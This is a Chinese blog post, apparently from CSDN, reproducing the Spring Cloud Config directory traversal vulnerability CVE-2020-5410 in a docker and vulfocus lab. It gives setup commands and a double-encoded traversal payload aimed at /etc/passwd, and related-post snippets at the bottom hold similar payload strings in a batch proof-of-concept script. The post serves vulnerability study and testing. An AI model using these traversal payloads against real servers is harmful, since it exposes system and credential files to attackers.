Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现

最新推荐文章于 2025-03-25 02:14:03 发布
最新推荐文章于 2025-03-25 02:14:03 发布
阅读量2.6k 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: spring cloud 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/119511205
版权

Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现

文章目录

漏洞介绍

Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击

影响版本

Spring Cloud Config: 2.2.0 to 2.2.2

Spring Cloud Config: 2.1.0 to 2.1.8

环境搭建

打开vulhub发现没有这个镜像,这边手动搭建,版本v2.2.2

docker环境部署:
docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-07COVBIT-1628391524375)(https://i.loli.net/2021/08/08/oJQTsiV84Mw36yY.png)]

再分别运行这三步

docker run -it --name=spring-cloud-config-server \

-p 8888:8888 \

hyness/spring-cloud-config-server:2.1.6.RELEASE \

–spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo

image-20210808100742624

然后访问自己地址的8888端口,我这里是192.168.89.130:8888,成功打开

image-20210808100906518

这里的漏洞是get请求,这里直接用hackbar演示

poc:

..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development

但是这里失败了没东西出了,可能是文件目录搞错了,其实这里…%252F就是相当于…/ 上面要读取的就是etc/passwd

vulfocus复现

image-20210808105059468

转到这里,找flag,在tmp目录下直接呈现,对应的只需要读取tmp,passwd部分的目录直接删去就可以了

image-20210808105549876

参考:

https://xz.aliyun.com/t/7877

https://blog.csdn.net/qq_37602797/article/details/113886722

spring框架漏洞整理(Spring Cloud Config路径穿越导致的信息泄露)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1236
CVE-2020-5405 Spring Cloud Config路径穿越导致的信息泄露。 此spring框架漏洞影响版本:spring-cloud-config-server < 2.2.2 https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/65bbd0ec4f2fd012318f7d91548ba1f338d5e064/Spring%20Cloud/CVE-2020-5405%20Spring%20Cloud
Spring Cloud Function SpEL表达式注入(CVE-2022-22963)
李火火的安全圈
04-02 1408
文章目录声明前言一、漏洞概述二、影响版本三、本地复现四、漏洞原理五、官方修复文档 声明 本文章仅用于漏洞复现和技术学习,切勿从事非法渗透行为,切记! 前言 在 Spring Cloud Function 版本 3.1.6、3.2.2 和不受支持的旧版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问。 一、漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由 funct
【漏洞复现-spring-目录遍历】vulfocus/spring-cve_2020_5410
10-15 1530
spring-目录遍历】
Spring Cloud Config 目录穿越漏洞CVE-2020-5410复现
Brucetg的博客
06-15 5125
Spring Cloud Config Spring Cloud ConfigSpring Cloud 中用于分布式配置管理的组件,Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.1.0 to 2.1.8 复现过程 https://github.com/spring-cloud/spring-cloud-config/releas
常见框架漏洞(三)----Spring
最新发布
qq_65379983的博客
03-25 725
Sping框架常见漏洞 远程命令执行漏洞 代码执行漏洞
Spring 目录遍历 (CVE-2020-5410复现
YouthBelief的博客
11-03 1346
Spring 目录遍历 (CVE-2020-5410Spring 目录遍历 (CVE-2020-5410 )0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Spring 目录遍历 (CVE-2020-5410 ) 0x01 漏洞描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9
Spring Cloud Config目录遍历漏洞(CVE-2019-3799)
Li-D的博客
09-16 2831
漏洞描述 Spring Cloud Config目录遍历漏洞的本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件。攻击者可以构建恶意URL以利用目录遍历漏洞。 漏洞危害 由于spring-cloud-config-server模块未对传入路径进行安全限制,攻击者可以利用多个…%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。 漏洞影响版本 Spring Cloud Config 2.1.0 to 2.1.1 Spring Cloud Conf
CVE-2022-22947:Spring Cloud Gateway RCE漏洞分析以及复现
qq_50808416的博客
05-15 3727
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2187
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告
爱国小白帽
06-03 2513
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HwKUmigU-1591180764214)(https://mmbiz.qpic.cn/mmbiz_jpg/Ic3Rgfdm96f3TFLd7feDIDR9fSLfwvia5uVr9YcNbGcyssibBJCUGb253Z0D64Xbf
[Vulfocus解题系列] Spring 目录遍历 (CVE-2020-5410
00勇士王子的博客
07-13 2765
漏洞介绍 名称: Spring 目录遍历 (CVE-2020-5410 ) 描述: Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可
iss版本服务器读取_【漏洞预警】Spring Cloud Config Server路径穿越与任意文件读取漏洞...
weixin_39882589的博客
12-18 421
漏洞名称:Spring Cloud Config Server路径穿越与任意文件读取漏洞漏洞等级:高危漏洞编号:CVE-2019-3799漏洞描述Spring Cloud Config是Spirng Cloud下用于分布式配置管理的组件,分为Config-Server和Config-Client两个角色。Config-Server负责集中存储/管理配置文件,Config-Client则可以从Con...
Vulfocus-Spring 目录遍历(CVE-2020-5410
qq_41819939的博客
07-29 600
SpringCloudConfig是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本。...
Spring 目录遍历(CVE-2020-5410)
weixin_46801402的博客
11-02 620
Spring 目录遍历(CVE-2020-5410)
SpringCloud CVE_2019_3799--CVE_2020_5410 批量poc
weixin_45427650的博客
04-17 902
import requests import argparse import re CVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini' CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd' CVE_2020_5410_linux = r'/..
Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest
qq_34341458的博客
04-11 4209
0x01 描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 0x02 靶场地址 靶场地址:http://v
spring cloud config server目录遍历漏洞 CVE-2020-5410
weixin_47267061的博客
03-10 619
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值